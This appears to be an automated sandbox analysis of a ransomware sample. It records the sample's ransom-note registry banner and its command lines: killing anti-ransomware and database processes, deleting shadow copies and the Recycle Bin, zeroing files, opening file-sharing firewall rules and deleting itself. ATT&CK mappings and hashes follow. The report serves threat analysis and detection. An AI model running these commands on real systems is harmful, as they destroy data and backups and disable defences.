System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
"C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe"
1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1084
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:756
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1120
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1052
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:980
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:864
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:652
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:544
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:704
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1728
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:800
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1616
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:728
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:768
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1184
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:824
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:788
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1248
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:1708
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:860
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1088
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:532
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:396
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1704
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1600
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1160
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2028
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:284
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1068
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:572
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1912
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1516
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1932
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1360
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:436
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:932
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:672
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:292
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:320
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1688
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1012
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:992
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1756
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:328
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1144
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1308
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1476
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:776
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:1348
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:956
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1620
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1540
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:644
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:892
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:268
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:728
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:956
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1068
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:892
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
  2⤵
  - Modifies Internet Explorer settings
  PID:1472
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:2032
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:1904
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:1276
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
  2⤵
  - Deletes itself
  PID:916
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:972

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Filesize
22KB

MD5
c09e7c742e3531ba4c982b035ef6e994

SHA1
9fbae0889aa69c457a70da69b58aee327fd1c9cc

SHA256
5595fdf90977d8d5d34aa7cd47395e9b9292a425f4a6824d1586c2d120cfc6e0

SHA512
6e7e789827184c1613d0dfc2397b78d8525ad72631af7d80b1b7d06eac9f06ecebbb2705a578f30dbc162d12def1b74fddcf104cfaab9f9d2e0475cab31f9051

Download Submit
memory/268-126-0x0000000000000000-mapping.dmp

Download
memory/268-129-0x000000001AB80000-0x000000001AB81000-memory.dmp

Filesize
4KB

Download
memory/268-128-0x0000000002450000-0x0000000002451000-memory.dmp

Filesize
4KB

Download
memory/268-133-0x000000001A7A0000-0x000000001A7A1000-memory.dmp

Filesize
4KB

Download
memory/268-132-0x000000001AB04000-0x000000001AB06000-memory.dmp

Filesize
8KB

Download
memory/268-131-0x000000001AB00000-0x000000001AB02000-memory.dmp

Filesize
8KB

Download
memory/268-130-0x00000000026C0000-0x00000000026C1000-memory.dmp

Filesize
4KB

Download
memory/284-96-0x0000000000000000-mapping.dmp

Download
memory/292-106-0x0000000000000000-mapping.dmp

Download
memory/320-107-0x0000000000000000-mapping.dmp

Download
memory/328-113-0x0000000000000000-mapping.dmp

Download
memory/396-89-0x0000000000000000-mapping.dmp

Download
memory/436-103-0x0000000000000000-mapping.dmp

Download
memory/532-88-0x0000000000000000-mapping.dmp

Download
memory/544-68-0x0000000000000000-mapping.dmp

Download
memory/572-98-0x0000000000000000-mapping.dmp

Download
memory/644-123-0x0000000000000000-mapping.dmp

Download
memory/652-67-0x0000000000000000-mapping.dmp

Download
memory/672-105-0x0000000000000000-mapping.dmp

Download
memory/704-69-0x0000000000000000-mapping.dmp

Download
memory/728-75-0x0000000000000000-mapping.dmp

Download
memory/728-134-0x0000000000000000-mapping.dmp

Download
memory/756-62-0x0000000000000000-mapping.dmp

Download
memory/768-74-0x0000000000000000-mapping.dmp

Download
memory/776-117-0x0000000000000000-mapping.dmp

Download
memory/788-79-0x0000000000000000-mapping.dmp

Download
memory/800-72-0x0000000000000000-mapping.dmp

Download
memory/824-77-0x0000000000000000-mapping.dmp

Download
memory/860-84-0x0000000000000000-mapping.dmp

Download
memory/864-66-0x0000000000000000-mapping.dmp

Download
memory/864-70-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

Filesize
8KB

Download
memory/892-124-0x0000000000000000-mapping.dmp

Download
memory/932-104-0x0000000000000000-mapping.dmp

Download
memory/956-118-0x0000000000000000-mapping.dmp

Download
memory/980-65-0x0000000000000000-mapping.dmp

Download
memory/992-111-0x0000000000000000-mapping.dmp

Download
memory/1012-110-0x0000000000000000-mapping.dmp

Download
memory/1052-64-0x0000000000000000-mapping.dmp

Download
memory/1060-85-0x0000000000000000-mapping.dmp

Download
memory/1068-97-0x0000000000000000-mapping.dmp

Download
memory/1084-61-0x000000001A970000-0x000000001A972000-memory.dmp

Filesize
8KB

Download
memory/1084-59-0x00000000008D0000-0x00000000008D1000-memory.dmp

Filesize
4KB

Download
memory/1088-87-0x0000000000000000-mapping.dmp

Download
memory/1112-92-0x0000000000000000-mapping.dmp

Download
memory/1120-63-0x0000000000000000-mapping.dmp

Download
memory/1144-114-0x0000000000000000-mapping.dmp

Download
memory/1160-95-0x0000000000000000-mapping.dmp

Download
memory/1184-76-0x0000000000000000-mapping.dmp

Download
memory/1248-78-0x0000000000000000-mapping.dmp

Download
memory/1300-90-0x0000000000000000-mapping.dmp

Download
memory/1308-115-0x0000000000000000-mapping.dmp

Download
memory/1348-119-0x0000000000000000-mapping.dmp

Download
memory/1360-102-0x0000000000000000-mapping.dmp

Download
memory/1432-120-0x0000000000000000-mapping.dmp

Download
memory/1476-116-0x0000000000000000-mapping.dmp

Download
memory/1516-100-0x0000000000000000-mapping.dmp

Download
memory/1540-122-0x0000000000000000-mapping.dmp

Download
memory/1596-83-0x0000000000000000-mapping.dmp

Download
memory/1600-93-0x0000000000000000-mapping.dmp

Download
memory/1612-86-0x0000000000000000-mapping.dmp

Download
memory/1616-73-0x0000000000000000-mapping.dmp

Download
memory/1620-121-0x0000000000000000-mapping.dmp

Download
memory/1688-108-0x0000000000000000-mapping.dmp

Download
memory/1704-91-0x0000000000000000-mapping.dmp

Download
memory/1708-81-0x0000000000000000-mapping.dmp

Download
memory/1716-109-0x0000000000000000-mapping.dmp

Download
memory/1728-71-0x0000000000000000-mapping.dmp

Download
memory/1756-112-0x0000000000000000-mapping.dmp

Download
memory/1912-99-0x0000000000000000-mapping.dmp

Download
memory/1932-101-0x0000000000000000-mapping.dmp

Download
memory/1956-125-0x0000000000000000-mapping.dmp

Download
memory/1964-82-0x0000000000000000-mapping.dmp

Download
memory/2028-94-0x0000000000000000-mapping.dmp

Download